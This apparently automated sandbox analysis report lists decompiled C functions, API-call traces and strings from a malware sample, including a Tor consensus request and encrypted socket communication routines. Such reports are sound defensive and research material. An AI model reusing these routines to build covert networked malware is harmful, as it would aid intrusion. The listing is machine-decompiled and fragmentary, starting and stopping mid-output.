      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4E0B
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E3F
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E60
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E76
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4E8C
      • Part of subcall function 003D4DC1: strstr.MSVCRT ref: 003D4EA2
      • Part of subcall function 003D4DC1: sscanf.MSVCRT ref: 003D4ED4
      • Part of subcall function 003D4DC1: sprintf.MSVCRT ref: 003D4EFB
      • Part of subcall function 003D4DC1: sscanf.MSVCRT ref: 003D4F43
      • Part of subcall function 003D4DC1: strtok.MSVCRT ref: 003D4F88
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
    Strings
    • GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0Host: %s, xrefs: 003D5067
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DEA68, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31network
    C-Code - Quality: 16%
    			E003DEA68(char* _a4, intOrPtr* _a8, short* _a12) {
				char _v8;
				char _v24;
				short _t11;

				if(sscanf(_a4, "%15[^:]:%d",  &_v24,  &_v8) == 2) {
					_t11 =  &_v24;
					__imp__#11(_t11);
					 *_a8 = _t11;
					if(_t11 == 0xffffffff) {
						goto L1;
					} else {
						__imp__#9(_v8);
						 *_a12 = _t11;
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}






    0x003dea8a
    0x003dea90
    0x003dea94
    0x003dea9d
    0x003deaa2
    0x00000000
    0x003deaa4
    0x003deaa7
    0x003deab0
    0x003deab7
    0x003deab7
    0x003dea8c
    0x003dea8c
    0x003dea8f
    0x003dea8f

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C4BF0, Relevance: 6.3, APIs: 4, Instructions: 279sleep
    C-Code - Quality: 60%
    			E003C4BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				char _v256;
				char _v780;
				char _v1304;
				char _v1828;
				intOrPtr _t97;
				void* _t98;
				char _t99;
				void* _t110;
				char _t112;
				void* _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t123;
				intOrPtr _t125;
				void* _t130;
				void* _t137;
				intOrPtr _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t157;
				void* _t168;
				void* _t170;
				intOrPtr _t176;
				intOrPtr _t179;
				intOrPtr _t181;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				char* _t192;
				signed int _t193;
				signed int _t195;
				char* _t202;
				char _t208;
				void* _t212;
				void* _t214;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t226;
				void* _t228;

				_t219 = __eflags;
				_t208 = 0;
				_t214 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v20 = 0;
				_v28 = 0;
				_v16 = 0;
				E003CE520( &_v56);
				E003C9090(_t219,  &_v256, 0x71);
				_t97 =  *0x3e8628; // 0x622508
				_t217 = _t216 + 8;
				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x10))))( &_v256, 0x105,  &_v1828, 0, __edi, __esi, __ebx);
				_t220 = _t98;
				if(_t98 == 0) {
					L32:
					_t99 = _v8;
					L34:
					if(_t99 != _t208) {
						E003CBB40(_t99);
						_t217 = _t217 + 4;
					}
					L37:
					_t100 = _v12;
					if(_v12 != _t208) {
						E003CBB40(_t100);
						_t217 = _t217 + 4;
					}
					_t101 = _v16;
					if(_v16 != _t208) {
						E003CBB40(_t101);
					}
					E003C7AD0( &_v56);
					return _v28;
				}
				E003C9090(_t220,  &_v256, 0x72);
				_t13 = _t214 + 0x10; // 0xa06850ff
				_push( *_t13);
				_t110 = E003D0C10( &_v780, 0x105,  &_v256,  &_v1828);
				_t217 = _t217 + 0x1c;
				if(_t110 < 0) {
					goto L32;
				}
				_v24 = 0;
				if( *((intOrPtr*)(_t214 + 0x20)) <= 0) {
					L30:
					_t99 = _v8;
					_v28 = 1;
					goto L34;
				} else {
					_t157 = 0;
					while(1) {
						_t111 = _v12;
						_v36 = _t208;
						_v32 = _t208;
						if(_v12 != _t208) {
							E003CBB40(_t111);
							_t217 = _t217 + 4;
							_v12 = _t208;
						}
						_t112 = _v8;
						_t224 = _t112 - _t208;
						if(_t112 != _t208) {
							E003CBB40(_t112);
							_t217 = _t217 + 4;
							_v8 = _t208;
						}
						E003C9090(_t224,  &_v256, 0x73);
						_t26 = _t214 + 0x28; // 0x5d89ec5d
						_push( *((intOrPtr*)( *_t26 + _t157 + 4)));
						_t116 = E003D0C10( &_v1304, 0x105,  &_v256,  &_v780);
						_t217 = _t217 + 0x1c;
						if(_t116 < 0) {
							goto L32;
						}
						_t192 =  &_v1304;
						_t117 = E003CED90(_t192, _t208, _t208,  &_v36);
						__imp___time64(_t208);
						_t34 = _t214 + 0x28; // 0x5d89ec5d
						_t118 =  *_t34;
						_t217 = _t217 + 0x14;
						_t168 = _t117 -  *((intOrPtr*)(_t118 + _t157 + 0x10));
						asm("sbb edi, [eax+ebx+0x14]");
						_t193 =  *(_t118 + _t157 + 8);
						_t123 = (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193;
						asm("cdq");
						_t226 = _t192 - _t193;
						if(_t226 < 0 || _t226 <= 0 && _t168 <= _t123) {
							L29:
							_t125 = _v24 + 1;
							_t157 = _t157 + 0x18;
							_t208 = 0;
							_v24 = _t125;
							_t86 = _t214 + 0x20; // 0xd05d8953
							if(_t125 <  *_t86) {
								continue;
							}
							goto L30;
						} else {
							__imp___time64(0);
							_t39 = _t214 + 0x28; // 0x5d89ec5d
							_t195 =  *( *_t39 + _t157 + 8);
							_t130 = (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195;
							_t217 = _t217 + 4;
							_t170 = _t123 - _v36;
							asm("cdq");
							asm("sbb edi, [ebp-0x1c]");
							_t228 = _t193 - _t195;
							if(_t228 >= 0 && (_t228 > 0 || _t170 > _t130)) {
								_t43 = _t214 + 0x44; // 0x89c933ff
								if(E003D1840( *((intOrPtr*)( *_t43 + 8))) == 0) {
									goto L29;
								}
								_t133 = _v16;
								if(_v16 != 0) {
									E003CBB40(_t133);
									_t217 = _t217 + 4;
								}
								_t46 = _t214 + 0x44; // 0x89c933ff
								_v16 = E003CDF10( *((intOrPtr*)( *_t46 + 8)));
								_t212 = 0;
								while(1) {
									_t49 = _t214 + 0x28; // 0x5d89ec5d
									_push( &_v20);
									_push( &_v8);
									_t54 = _t214 + 0x44; // 0x89c933ff
									_push( *((intOrPtr*)( *_t49 + _t157 + 4)));
									_push(5);
									_push( *((intOrPtr*)( *_t54 + 8)));
									_t137 = E003C5A10();
									_t217 = _t217 + 0x14;
									if(_t137 != 0) {
										break;
									}
									Sleep(0x1388);
									_t212 = _t212 + 1;
									if(_t212 < 5) {
										continue;
									}
									goto L29;
								}
								_t99 = _v8;
								__eflags = _t99;
								if(_t99 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L37;
								}
								_t176 = _v20;
								__eflags = _t176;
								if(_t176 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L34;
								}
								_t60 = _t214 + 0x44; // 0x89c933ff
								_t139 = E003C9F70( &_v56,  *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8)))), _t99, _t176,  &_v12,  &_v40);
								__eflags = _t139;
								if(_t139 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L32;
								}
								_t179 =  *0x3e8628; // 0x622508
								_t141 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xc0))))( &_v780);
								__eflags = _t141 - 0xffffffff;
								if(_t141 == 0xffffffff) {
									_t184 =  *0x3e8628; // 0x622508
									 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x1e4))))( &_v780);
									_t185 =  *0x3e8628; // 0x622508
									 *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x54))))( &_v780, 0);
									_t186 =  *0x3e8628; // 0x622508
									 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x1d8))))( &_v780);
								}
								_t202 =  &_v1304;
								_t143 = E003C1A80(_v8, _t202, _v8, _v20);
								__imp___time64(0);
								_t74 = _t214 + 0x28; // 0x5d89ec5d
								_t181 =  *_t74;
								_t217 = _t217 + 0x10;
								__eflags = _a4;
								 *((intOrPtr*)(_t181 + _t157 + 0x10)) = _t143;
								 *((intOrPtr*)(_t181 + _t157 + 0x14)) = _t202;
								if(__eflags == 0) {
									_t80 = _t214 + 0x28; // 0x5d89ec5d
									E003C2E90(_t214,  *((intOrPtr*)( *_t80 + _t157 + 4)),  *((intOrPtr*)( *_t80 + _t157)));
								}
							}
							goto L29;
						}
					}
					goto L32;
				}
			}





















































    0x003c4bf0
    0x003c4bfc
    0x003c4bfe
    0x003c4c03
    0x003c4c06
    0x003c4c09
    0x003c4c0c
    0x003c4c0f
    0x003c4c12
    0x003c4c15
    0x003c4c23
    0x003c4c28
    0x003c4c2d
    0x003c4c47
    0x003c4c49
    0x003c4c4b
    0x003c4ef8
    0x003c4ef8
    0x003c4eff
    0x003c4f01
    0x003c4f04
    0x003c4f09
    0x003c4f09
    0x003c4f10
    0x003c4f10
    0x003c4f15
    0x003c4f18
    0x003c4f1d
    0x003c4f1d
    0x003c4f20
    0x003c4f28
    0x003c4f2b
    0x003c4f30
    0x003c4f36
    0x003c4f41
    0x003c4f41
    0x003c4c5a
    0x003c4c5f
    0x003c4c62
    0x003c4c7d
    0x003c4c82
    0x003c4c87
    0x00000000
    0x00000000
    0x003c4c8d
    0x003c4c93
    0x003c4eea
    0x003c4eea
    0x003c4eed
    0x00000000
    0x003c4c99
    0x003c4c99
    0x003c4ca0
    0x003c4ca0
    0x003c4ca3
    0x003c4ca6
    0x003c4cab
    0x003c4cae
    0x003c4cb3
    0x003c4cb6
    0x003c4cb6
    0x003c4cb9
    0x003c4cbc
    0x003c4cbe
    0x003c4cc1
    0x003c4cc6
    0x003c4cc9
    0x003c4cc9
    0x003c4cd5
    0x003c4cda
    0x003c4ce1
    0x003c4cfc
    0x003c4d01
    0x003c4d06
    0x00000000
    0x00000000
    0x003c4d11
    0x003c4d19
    0x003c4d1f
    0x003c4d27
    0x003c4d27
    0x003c4d2a
    0x003c4d2d
    0x003c4d33
    0x003c4d37
    0x003c4d44
    0x003c4d46
    0x003c4d47
    0x003c4d49
    0x003c4ed5
    0x003c4ed8
    0x003c4ed9
    0x003c4edc
    0x003c4ede
    0x003c4ee1
    0x003c4ee4
    0x00000000
    0x00000000
    0x00000000
    0x003c4d59
    0x003c4d5b
    0x003c4d63
    0x003c4d66
    0x003c4d75
    0x003c4d77
    0x003c4d7a
    0x003c4d7d
    0x003c4d7e
    0x003c4d81
    0x003c4d83
    0x003c4d93
    0x003c4da0
    0x00000000
    0x00000000
    0x003c4da6
    0x003c4dab
    0x003c4dae
    0x003c4db3
    0x003c4db3
    0x003c4db6
    0x003c4dc1
    0x003c4dc4
    0x003c4dc6
    0x003c4dc6
    0x003c4dcc
    0x003c4dd4
    0x003c4dd5
    0x003c4ddb
    0x003c4ddc
    0x003c4dde
    0x003c4ddf
    0x003c4de4
    0x003c4de9
    0x00000000
    0x00000000
    0x003c4df0
    0x003c4df6
    0x003c4dfa
    0x00000000
    0x00000000
    0x00000000
    0x003c4dfc
    0x003c4e01
    0x003c4e04
    0x003c4e06
    0x003c4f0e
    0x003c4f0e
    0x00000000
    0x003c4f0e
    0x003c4e0c
    0x003c4e0f
    0x003c4e11
    0x003c4efd
    0x003c4efd
    0x00000000
    0x003c4efd
    0x003c4e21
    0x003c4e2d
    0x003c4e32
    0x003c4e34
    0x003c4ef6
    0x003c4ef6
    0x00000000
    0x003c4ef6
    0x003c4e3a
    0x003c4e4d
    0x003c4e4f
    0x003c4e52
    0x003c4e54
    0x003c4e67
    0x003c4e69
    0x003c4e7b
    0x003c4e7d
    0x003c4e90
    0x003c4e90
    0x003c4e9a
    0x003c4ea1
    0x003c4ea8
    0x003c4eae
    0x003c4eae
    0x003c4eb1
    0x003c4eb4
    0x003c4eb8
    0x003c4ebc
    0x003c4ec0
    0x003c4ec2
    0x003c4ed0
    0x003c4ed0
    0x003c4ec0
    0x00000000
    0x003c4d83
    0x003c4d49
    0x00000000
    0x003c4ca0

    APIs
    • _time64.MSVCRT ref: 003C4D1F
    • _time64.MSVCRT ref: 003C4D5B
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • Sleep.KERNEL32(00001388), ref: 003C4DF0
    • _time64.MSVCRT ref: 003C4EA8
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C3070, Relevance: 6.2, APIs: 4, Instructions: 154
    C-Code - Quality: 70%
    			E003C3070(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v24;
				char _v224;
				char _t52;
				char _t53;
				void* _t56;
				char _t57;
				char _t58;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t97;
				intOrPtr _t104;
				intOrPtr _t109;
				char _t111;
				void* _t114;
				void* _t116;

				_t81 = __ebx;
				_t111 = 0;
				_t114 = __ecx;
				_v24 = 0;
				_v12 = 0;
				_v8 = 0;
				E003CBB30( &_v20);
				E003CB1E0(__ebx,  &_v20);
				if(E003CA140( &_v20, _a4) == 0) {
					L20:
					_t52 = _v12;
					if(_t52 != 0) {
						__imp__#6(_t52);
					}
					_t53 = _v8;
					if(_t53 != 0) {
						__imp__#6(_t53);
					}
					L003C26B0(_t81,  &_v20);
					return _v24;
				}
				_push(__ebx);
				_t56 = E003CDA00( &_v20);
				_t9 = _t111 + 1; // 0x1
				_t82 = _t9;
				if(_t56 == 0) {
					L18:
					_v24 = _t82;
					L19:
					_pop(_t81);
					goto L20;
				} else {
					goto L2;
				}
				do {
					L2:
					_t57 = _v12;
					if(_t57 != 0) {
						__imp__#6(_t57);
					}
					_t58 = _v8;
					_v12 = 0;
					if(_t58 != 0) {
						__imp__#6(_t58);
					}
					_v8 = 0;
					if(E003D0BE0( &_v20, _t111,  &_v12) == 0) {
						goto L19;
					} else {
						_t60 = E003CF2E0( &_v20, _t111,  &_v8);
						_t122 = _t60;
						if(_t60 == 0) {
							goto L19;
						}
						E003C9090(_t122,  &_v224, 0x81);
						_t63 =  *0x3e8628; // 0x622508
						_t116 = _t116 + 8;
						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xe0))))(_v12,  &_v224);
						_t123 = _t64;
						if(_t64 == 0) {
							E003C9090(_t123,  &_v224, 0x82);
							_t104 =  *0x3e8628; // 0x622508
							_t116 = _t116 + 8;
							_push( &_v224);
							_push(_v8);
							if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0xe0))))() != 0) {
								E003C9090(__eflags,  &_v224, 0x83);
								_t97 =  *0x3e8628; // 0x622508
								_t116 = _t116 + 8;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0xe0))))(_v8,  &_v224);
								if(__eflags != 0) {
									E003C9090(__eflags,  &_v224, 0x84);
									_t75 =  *0x3e8628; // 0x622508
									_t116 = _t116 + 8;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0xe0))))(_v8,  &_v224);
									if(__eflags != 0) {
										E003C9090(__eflags,  &_v224, 0xc4);
										_t109 =  *0x3e8628; // 0x622508
										_t116 = _t116 + 8;
										_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v8,  &_v224);
										__eflags = _t80;
										if(_t80 == 0) {
											 *((intOrPtr*)(_t114 + 0x3c)) = _t82;
										}
									} else {
										 *((intOrPtr*)(_t114 + 0x38)) = _t82;
									}
								} else {
									 *((intOrPtr*)(_t114 + 0x34)) = _t82;
								}
							} else {
								 *((intOrPtr*)(_t114 + 0x30)) = _t82;
							}
						}
					}
					_t111 = _t111 + _t82;
				} while (_t111 < E003CDA00( &_v20));
				goto L18;
			}

























    0x003c3070
    0x003c307b
    0x003c307d
    0x003c3082
    0x003c3085
    0x003c3088
    0x003c308b
    0x003c3093
    0x003c30a6
    0x003c3236
    0x003c3236
    0x003c323d
    0x003c3240
    0x003c3240
    0x003c3246
    0x003c324b
    0x003c324e
    0x003c324e
    0x003c3257
    0x003c3262
    0x003c3262
    0x003c30ac
    0x003c30b0
    0x003c30b5
    0x003c30b5
    0x003c30ba
    0x003c3232
    0x003c3232
    0x003c3235
    0x003c3235
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c30c0
    0x003c30c0
    0x003c30c0
    0x003c30c5
    0x003c30c8
    0x003c30c8
    0x003c30ce
    0x003c30d1
    0x003c30da
    0x003c30dd
    0x003c30dd
    0x003c30eb
    0x003c30f9
    0x00000000
    0x003c30ff
    0x003c3107
    0x003c310c
    0x003c310e
    0x00000000
    0x00000000
    0x003c3120
    0x003c3128
    0x003c312d
    0x003c313e
    0x003c3140
    0x003c3142
    0x003c3154
    0x003c315c
    0x003c3162
    0x003c316b
    0x003c3172
    0x003c3177
    0x003c318d
    0x003c3195
    0x003c319b
    0x003c31ae
    0x003c31b0
    0x003c31c3
    0x003c31cb
    0x003c31d0
    0x003c31e3
    0x003c31e5
    0x003c31f8
    0x003c3200
    0x003c3206
    0x003c3217
    0x003c3219
    0x003c321b
    0x003c321d
    0x003c321d
    0x003c31e7
    0x003c31e7
    0x003c31e7
    0x003c31b2
    0x003c31b2
    0x003c31b2
    0x003c3179
    0x003c3179
    0x003c3179
    0x003c3177
    0x003c3142
    0x003c3223
    0x003c322a
    0x00000000

    APIs
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • SysFreeString.OLEAUT32(?), ref: 003C30C8
    • SysFreeString.OLEAUT32(?), ref: 003C30DD
      • Part of subcall function 003D0BE0: SysAllocString.OLEAUT32(?), ref: 003D0BF3
      • Part of subcall function 003CF2E0: SysAllocString.OLEAUT32(?), ref: 003CF2F4
    • SysFreeString.OLEAUT32(?), ref: 003C3240
    • SysFreeString.OLEAUT32(?), ref: 003C324E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D3EE9, Relevance: 6.1, APIs: 4, Instructions: 126network
    C-Code - Quality: 30%
    			E003D3EE9(intOrPtr* __eax, void* __ecx, void* __eflags) {
				void* _v8;
				void* _v12;
				char _v32;
				void _v148;
				void* __esi;
				short _t38;
				void* _t54;
				void _t55;
				intOrPtr* _t68;
				void* _t70;
				signed int _t71;
				void* _t78;
				void* _t86;

				_t70 = __ecx;
				_t68 = __eax;
				_t78 =  *0x3e8538(0x200);
				_v8 = _t78;
				_v12 =  *0x3e8538(0x200);
				memset(_t78, 0, 0x200);
				 *_t78 = 0xd;
				_t38 = E003DE937(_t70);
				 *((short*)(_t68 + 0x138)) = _t38;
				__imp__#9(_t38);
				 *((short*)(_t78 + 3)) = _t38;
				 *0x3e899c(_t68 + 8, _t78, 0x1fd);
				_t71 = 0x1d;
				memcpy( &_v148, _t68 + 8, _t71 << 2);
				 *0x3e8ab0( &_v148,  &_v32);
				_t86 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				memset(_t86, 0, 0x200);
				if(E003D3BB7(_t68 + 0xf0, _v8, 0x1fd, _t86 + 3, _t68 + 0x110, _t68 + 0x120) == 0) {
					L7:
					 *0x3e8540(_v8);
					 *0x3e8540(_t86);
					_t54 = 0;
				} else {
					_t55 =  *(_t68 + 4) & 0x0000ffff;
					__imp__#9(_t55);
					 *_t86 = _t55;
					 *((char*)(_t86 + 2)) = 3;
					if(E003DFD0B( *_t68, _t86, 0x200) != 0x200) {
						goto L7;
					} else {
						if(E003DFB73( *_t68, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t68 + 0x100, _v8 + 3, 0x1fd, _v12, _t68 + 0x124, _t68 + 0x134) == 0 ||  *_v12 != 4) {
							_t86 = _v12;
							goto L7;
						} else {
							 *0x3e8540(_v8);
							 *0x3e8540(_v12);
							_t54 = 1;
						}
					}
				}
				return _t54;
			}
















    0x003d3ee9
    0x003d3efb
    0x003d3f03
    0x003d3f06
    0x003d3f16
    0x003d3f19
    0x003d3f21
    0x003d3f24
    0x003d3f2a
    0x003d3f31
    0x003d3f38
    0x003d3f41
    0x003d3f49
    0x003d3f5e
    0x003d3f60
    0x003d3f6c
    0x003d3f78
    0x003d3f7b
    0x003d3fab
    0x003d4024
    0x003d4027
    0x003d402e
    0x003d4034
    0x003d3fad
    0x003d3fad
    0x003d3fb2
    0x003d3fb9
    0x003d3fbc
    0x003d3fcd
    0x00000000
    0x003d3fcf
    0x003d3fde
    0x003d4021
    0x00000000
    0x003d4038
    0x003d403b
    0x003d4044
    0x003d404c
    0x003d404c
    0x003d3fde
    0x003d3fcd
    0x003d4053

    APIs
    • memset.MSVCRT ref: 003D3F19
    • htons.WS2_32(00000000), ref: 003D3F31
    • memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D3FB2
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0A40, Relevance: 6.1, APIs: 4, Instructions: 122
    C-Code - Quality: 75%
    			E003E0A40(intOrPtr* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v212;
				void* __ebx;
				void* _t34;
				void* _t40;
				intOrPtr _t47;
				signed int _t51;
				intOrPtr _t52;
				intOrPtr* _t53;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				void* _t77;
				void* _t78;

				_t73 = __esi;
				_t71 = __edi;
				_t51 = 0;
				_v8 = 0;
				_v12 = 0;
				E003C9090(__eflags,  &_v212, 0xcf);
				_t34 = E003C3C70( &_v12,  &_v212,  &_v8,  &_v12);
				_t78 = _t77 + 0x14;
				_t81 = _t34;
				if(_t34 != 0) {
					L2:
					if(_v8 == _t51) {
						L19:
						return _t51;
					}
					if(_v12 <= 4) {
						L17:
						_t36 = _v8;
						if(_v8 != 0) {
							E003CBB40(_t36);
						}
						goto L19;
					}
					_push(0x34);
					L003CA47E();
					_t78 = _t78 + 4;
					if(_t34 == _t51) {
						goto L17;
					}
					_push(_t73);
					_t74 = E003C70B0(_t34);
					if(_t74 == _t51) {
						L16:
						goto L17;
					}
					_push(_t71);
					_t40 = E003E09A0(_a4, _t74,  &_v212, _v8, _v12);
					_t78 = _t78 + 0x14;
					if(_t40 == 0) {
						L14:
						E003CCB70(_t51, _t74, _t71);
						_push(_t74);
						L003C1CB0();
						_t78 = _t78 + 4;
						L15:
						goto L16;
					}
					_t71 = _a8;
					if( *((intOrPtr*)(_t74 + 0x10)) <=  *((intOrPtr*)( *_t71 + 0x10))) {
						goto L14;
					}
					_t68 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xac))))(0x3e8594);
					_t52 =  *_t71;
					if(_t52 != 0) {
						E003CCB70(_t52, _t52, _t71);
						_push(_t52);
						L003C1CB0();
						_t78 = _t78 + 4;
					}
					 *_t71 = _t74;
					_t59 =  *0x3e8628; // 0x622508
					_t69 =  *((intOrPtr*)(_t59 + 0xc4));
					 *_t69(0x3e8594);
					_t76 = 0;
					if( *((intOrPtr*)( *_t71 + 0x18)) <= 0) {
						L13:
						_t51 = 1;
						goto L15;
					} else {
						_t53 = __imp___time64;
						do {
							_t47 =  *_t53(0);
							_t61 =  *((intOrPtr*)( *_t71 + 0x28));
							 *((intOrPtr*)(_t61 + _t76 * 8)) = _t47;
							 *((intOrPtr*)(_t61 + 4 + _t76 * 8)) = _t69;
							_t69 =  *_t71;
							_t76 = _t76 + 1;
							_t78 = _t78 + 4;
						} while (_t76 <  *((intOrPtr*)(_t69 + 0x18)));
						goto L13;
					}
				}
				E003C9090(_t81,  &_v212, 0x10);
				_t34 = E003C3C70( &_v212,  &_v212,  &_v8,  &_v12);
				_t78 = _t78 + 0x14;
				if(_t34 == 0) {
					goto L17;
				}
				goto L2;
			}























    0x003e0a40
    0x003e0a40
    0x003e0a50
    0x003e0a58
    0x003e0a5b
    0x003e0a5e
    0x003e0a72
    0x003e0a77
    0x003e0a7a
    0x003e0a7c
    0x003e0aab
    0x003e0aae
    0x003e0ba5
    0x003e0bab
    0x003e0bab
    0x003e0ab8
